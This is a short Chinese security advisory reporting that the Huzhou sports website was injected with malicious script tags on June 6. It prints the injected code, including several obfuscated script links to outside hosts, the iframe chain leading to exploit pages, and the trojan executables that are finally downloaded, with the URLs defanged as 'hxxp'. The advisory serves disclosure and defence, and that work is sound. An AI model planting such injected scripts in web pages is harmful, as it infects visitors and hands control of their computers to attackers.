湖州体育网被植入恶意代码
6月6日,湖州体育网(hxxp://www.husports.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:hxxp://www.husports.com/content.asp
网页被嵌入恶意链接代码:
<script src=hxxp://cn.daxia123.cn/cn.js></script><script src=hxxp://cn.jxmmtv.com/cn.js></script><script src=hxxp://cn.jxmmtv.com/cn.js></script><script src=hxxp://3bomb.co%6D/c.js></script><script src=hxxp://cn.daxia123.cn/cn.js></script><script src=hxxp://cn.daxia123.cn/cn.js></script><script src=hxxp://3b%6F%6Db.com/c.js></script><script src=hxxp://3b3.org/c.js></script><script src=hxxp://3b3.org/c.js></script>
挂马分析:
[wide]hxxp://www.husports.com/content.asp
[script]hxxp://3bomb.co%6d/c.js
[frame]hxxp://bbb454g5.8866.org/a/a100.htm
[frame]hxxp://bbb454g5.8866.org/a/index.htm
[frame]hxxp://bbb454g5.8866.org/a/flash.htm
[frame]hxxp://bbb454g5.8866.org/a/a44.htm
[frame]hxxp://bbb454g5.8866.org/a/office.htm
[frame]hxxp://bbb454g5.8866.org/a/02.htm
[frame]hxxp://bbb454g5.8866.org/a/pef.pdf
[script]hxxp://js.tongji.cn.yahoo.com/1083501/ystat.js
[script]hxxp://s31.cnzz.com/stat.php?id=1408284&web_id=1408284
[frame]hxxp://bbb454g5.8866.org/a/a100.htm
[script]hxxp://js.tongji.linezing.com/1136402/tongji.js
最终下载病毒文件:
hxxp://oo2200.com/wm/02.exe
hxxp://oo2200.com/wm/14.exe
hxxp://oo2200.com/wm/of.exe
hxxp://oo2200.com/wm/pd.exe
通过执行以上病毒文件,来达到完全控制访问者的系统。
为防止病毒二次传播链接hxxp部分被置换为hxxp
关键字:湖州体育网
